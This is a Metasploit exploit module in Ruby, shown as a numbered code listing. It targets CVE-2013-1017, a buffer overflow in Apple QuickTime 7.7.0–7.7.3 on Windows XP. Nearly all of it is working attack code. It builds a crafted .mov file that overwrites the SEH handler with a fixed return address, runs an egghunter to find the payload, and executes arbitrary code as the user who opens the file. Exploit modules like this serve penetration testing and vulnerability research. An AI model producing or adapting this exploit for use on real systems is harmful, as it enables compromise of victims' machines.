Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = NormalRanking
8

9
  include Msf::Exploit::FILEFORMAT
10
  include Msf::Exploit::Egghunter
11

12
  def initialize(info={})
13
    super(update_info(info,
14
      'Name'           => "Apple Quicktime 7 Invalid Atom Length Buffer Overflow",
15
      'Description'    => %q{
16
        This module exploits a vulnerability found in Apple QuickTime. The flaw is
17
        triggered when QuickTime fails to properly handle the data length for certain
18
        atoms such as 'rdrf' or 'dref' in the Alis record, which may result a buffer
19
        overflow by loading a specially crafted .mov file, and allows arbitrary
20
        code execution under the context of the current user. Please note: Since an egghunter
21
        is used to search for the payload, this may require additional time for
22
        the exploit to complete.
23
      },
24
      'License'        => MSF_LICENSE,
25
      'Author'         =>
26
        [
27
          'Jason Kratzer', # Original Discovery & PoC (overlapped finding), aka pyoor
28
          'Tom Gallagher', # Original Discovery (overlapped)
29
          'Paul Bates',    # Original Discovery (overlapped)
30
          'sinn3r'         # Metasploit
31
        ],
32
      'References'     =>
33
        [
34
          [ 'CVE', '2013-1017' ],
35
          [ 'OSVDB', '93625' ],
36
          [ 'BID', '60097' ],
37
          [ 'URL', 'http://support.apple.com/kb/HT5770' ],
38
          [ 'ZDI', '13-110' ]
39
        ],
40
      'Platform'       => 'win',
41
      'Targets'        =>
42
        [
43
          # Ret = P/P/R in Quicktime.qtx
44
          # Tested on:
45
          # Quicktime 7.7.0
46
          # Quicktime 7.7.1
47
          # Quicktime 7.7.2
48
          # Quicktime 7.7.3
49
          [ 'Quicktime 7.7.0 - 7.7.3 on Windows XP SP3', {'Ret' => 0x66801042 } ]
50
        ],
51
      'Payload'        =>
52
        {
53
          'BadChars' => "\x00"
54
        },
55
      'Privileged'     => false,
56
      'DisclosureDate' => '2013-05-22',
57
      'DefaultTarget'	 => 0
58
    ))
59

60
    register_options(
61
      [
62
        OptString.new('FILENAME', [ true, 'The file name.',  'msf.mov']),
63
      ])
64
  end
65

66
  def sort_bytes(data)
67
    buf = ''
68
    0.step(data.length, 2) do |i|
69
      buf << data[i, 2].reverse
70
    end
71

72
    buf
73
  end
74

75
  def exploit
76
    fsize = 0
77

78
    badchars   = payload_badchars
79
    hunter,egg = generate_egghunter(payload.encoded,badchars,{:checksum=>true})
80

81
    buf  = ''
82
    buf << "\x61" * 5                                  # Make sure our NOPs don't cause AV
83
    buf << sort_bytes(make_nops(4))                    # Pad 9 bytes to ensure alignment
84
    buf << sort_bytes(hunter)                          # egg huntin'
85
    buf << rand_text_alpha(607 - buf.length)           # Offset 607 to nSEH
86
    buf << sort_bytes("\xeb\x06#{rand_text_alpha(2)}") # nSEH
87
    buf << sort_bytes([target.ret].pack("V*"))         # SE Handler
88
    buf << sort_bytes("\xe9\x95\xfd\xff\xff\xff")      # Jmp to egghunter
89
    buf << rand_text_alpha(50)                         # After SEH, only ~33 bytes
90
    buf << egg                                         # Should be found somewhere else
91

92
    # Quicktime File Format Specifications:
93
    # https://developer.apple.com/standards/qtff-2001.pdf
94
    mov  = "\x00\x00\x06\xDF"    # File size
95
    mov << "moov"                # Movie atom
96
    mov << "\x00\x00\x06\xD7"    # size (1751d)
97
    mov << "rmra"                # Reference Movie atom
98
    mov << "\x00\x00\x06\xCF"    # size (1743d)
99
    mov << "rmda"                # rmda atom
100
    mov << "\x00\x00\x06\xBF"    # size (1727d)
101
    mov << "rdrf"                # Data reference atom
102
    mov << "\x00\x00\x00\x00"    # size set to 0
103
    mov << "alis"                # Data reference type: FS alias record
104
    mov << "\x00\x00\x06\xAA"    # Size (1706d)
105
    mov << rand_text_alpha(8)
106
    mov << "\x00\x00\x06\x61"    # Size (1633d)
107
    mov << rand_text_alpha(38)
108
    mov << "\x12"
109
    mov << rand_text_alpha(81)
110
    mov << "\xFF\xFF"
111
    mov << rand_text_alpha(18)
112
    mov << "\x00\x08"            # Size (8d)
113
    mov << rand_text_alpha(8)
114
    mov << "\x00\x00"
115
    mov << "\x00\x08"            # Size (8d)
116
    mov << rand_text_alpha(8)
117
    mov << "\x00\x00"
118
    mov << "\x00\x26"            # Size (38d)
119
    mov << rand_text_alpha(38)
120
    mov << "\x00\x0F\x00\x0E"
121
    mov << "AA"                  # Size (must be invalid)
122
    mov << rand_text_alpha(12)
123
    mov << "\x00\x12\x00\x21"
124
    mov << rand_text_alpha(36)
125
    mov << "\x00"
126
    mov << "\x0F\x33"
127
    mov << rand_text_alpha(17)
128
    mov << "\x02\xF4"            # Size (756h)
129
    mov << rand_text_alpha(756)
130
    mov << "\xFF\xFF\x00\x00\x00"
131
    fsize += mov.length
132
    mov << buf
133
    fsize += buf.length
134

135
    mov[0,4] = [fsize].pack("N")
136

137
    print_status("Creating #{datastore['FILENAME']}")
138
    file_create(mov)
139
  end
140
end
141

142